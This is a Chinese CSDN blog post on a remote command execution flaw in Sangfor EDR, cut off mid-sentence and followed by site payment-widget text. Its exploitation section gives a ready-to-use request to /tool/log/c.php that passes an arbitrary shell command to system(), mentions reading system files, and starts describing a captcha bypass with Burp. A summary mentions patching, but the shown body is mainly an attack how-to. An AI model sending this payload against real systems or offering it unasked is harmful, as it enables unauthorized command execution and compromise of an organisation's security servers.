深信服EDR远程命令执行

本文介绍了深信服EDR的远程命令执行漏洞,包括利用方法、批量攻击手段、搜索漏洞的方法、受影响的版本、修复方式以及安全注意事项。通过分析,揭示了RCE漏洞、任意文件下载漏洞和验证码绕过等问题,并提醒用户更新到v3.2.21版本或应用补丁以修复漏洞。
摘要由CSDN通过智能技术生成

0x00简介
深信服EDR属于终端安全产品部,是深信服公司在安全业务的战略级投入产品。终端安全部门负责下一代终端安全解决方案的产品研发,基于先进的AI技术和高效的安全领域经验, 建设深信服整体安全解决方案的端点响应能力,与云、网、端产品联动,构建面向未来、有效防御的闭环体系。

image

0x01利用方法
1.https://xxx.xxx.xx.xx/tool/log/c.php?strip_slashes=system&host=id

image

2.linux读取文件

image

3.验证码绕过
// 校验验证码

if (!ldb_run_at_console()) {
if (isset($_REQUEST[“captcha”])
|| $_REQUEST[“captcha”] != base64_decode("M…
echo “验证码不对,请输入…”
return;
}
}

先输入几次错误密码,把验证码弄出来后,开启Burp(抓包工具ÿ

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值